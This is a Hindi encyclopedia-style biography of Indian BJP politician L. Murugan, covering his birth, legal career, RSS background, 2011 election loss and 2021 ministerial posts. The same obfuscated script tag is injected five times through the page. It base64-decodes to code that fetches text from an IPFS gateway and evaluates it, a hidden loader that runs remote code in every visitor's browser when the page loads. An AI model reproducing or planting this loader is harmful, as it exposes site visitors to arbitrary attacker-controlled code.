एल. मुरुगन
एल. मुरुगन
| |
पूरा नाम | डॉ. एल. मुरुगन |
जन्म | 29 मई, 1977 |
जन्म भूमि | पारामती, ज़िला नमक्कल, तमिलनाडु |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ |
पार्टी | भारतीय जनता पार्टी |
पद | मत्स्य पालन, पशुपालन और डेयरी राज्य मंत्री- 7 जुलाई, 2021 से सूचना एवं प्रसारण राज्य मंत्री- 7 जुलाई, 2021 से |
संबंधित लेख | भारतीय जनता पार्टी, नरेन्द्र मोदी का मंत्रिमण्डल |
अन्य जानकारी | एल. मुरुगन छात्र जीवन से ही राजनीति में सक्रिय हैं। वे अपने कॉलेज के समय से ही राष्ट्रीय स्वयंसेवक संघ के सक्रीय सदस्य रहे। साल 2011 में उन्होंने राशिपुरम से तमिलनाडु विधानसभा का चुनाव लडा था लेकिन असफल रहे थे। |
अद्यतन | 18:06, 12 जुलाई 2021 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>डॉ. एल. मुरुगन (अंग्रेज़ी: L. Murugan, जन्म- 29 मई, 1977) भारतीय जनता पार्टी के राजनीतिज्ञ और अधिवक्ता हैं। 7 जुलाई, 2021 को प्रधानमंत्री नरेन्द्र मोदी के मंत्रिमण्डल में विस्तार तथा फेरबदल के बाद वह 'मत्स्य पालन, पशुपालन और डेयरी मंत्रालय' और 'सूचना और प्रसारण मंत्रालय' में राज्य मंत्री के रूप में कार्यरत हैं।
परिचय
डॉ. एल. मुरुगन का जन्म 29 मई, 1977 को दक्षिणी राज्य तमिलनाडु के नमक्कल जिले के पारामती में हुआ था। उन्होंने मद्रास विश्वविद्यालय से कानून में परास्नातक की उपाधि प्राप्त की है। वे अभी भी मद्रास उच्च न्यायलय में वकालत करते हैं। 11 मार्च, 2020 को उन्हें तमिलनाडु प्रदेश भारतीय जनता पार्टी का अध्यक्ष्य बनाया गया था। इससे पूर्व वे 'राष्ट्रीय पिछडा आयोग' के उपाध्यक्ष पद पर भी कार्य कर चुके हैं।[1]
राजनीतिक सफर
एल. मुरुगन छात्र जीवन से ही राजनीति में सक्रिय हैं। वे अपने कॉलेज के समय से ही राष्ट्रीय स्वयंसेवक संघ के सक्रीय सदस्य रहे। साल 2011 में उन्होंने राशिपुरम से तमिलनाडु विधानसभा का चुनाव लडा था लेकिन असफल रहे थे। उन्हें केवल 1730 कुल मतदान का 1.07% वोट मिले थे। 11 मार्च, 2020 को एल. मुरुगन को भारतीय जनता पार्टी तमिलनाडु प्रदेश का अध्यक्ष नियुक्त किया गया।
एल. मुरुगन ने इस चुनाव में पार्टी के बेहतर प्रदर्शन का दावा किया। उन्होंने दावा किया कि पार्टी दोहरी अंकों की संख्या के साथ सरकार में बैठेगी। उन्होंने कहा कि राज्य सरकार द्वारा पिछले 10 वर्षों में क्रियान्वित की गई केंद्र की कल्याणकारी योजनाएं गठबंधन के पक्ष में आएंगी। उन्होंने कहा कि राज्य की जनता डीएमके को सबक सिखाने का इंतजार कर रही है, क्योंकि डीएमके सामाजिक न्याय की बात करती है लेकिन उसे अमल नहीं करती है। डीएमके द्वारा महिलाओं को सम्मान नहीं दिया जाता है। उन्होंने वी. के. शशिकला के राजनीति छोडऩे के निर्णय की सराहना करते हुए उन्हें सम्मानित महिला बताया था।[1]
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
- ↑ 1.0 1.1 बीजेपी प्रदेश अध्यक्ष एल मुरुगन पर टिकीं सबकी निगाहें (हिंदी) newsnationtv.com। अभिगमन तिथि: 12 जुलाई, 2021।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
संबंधित लेख
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>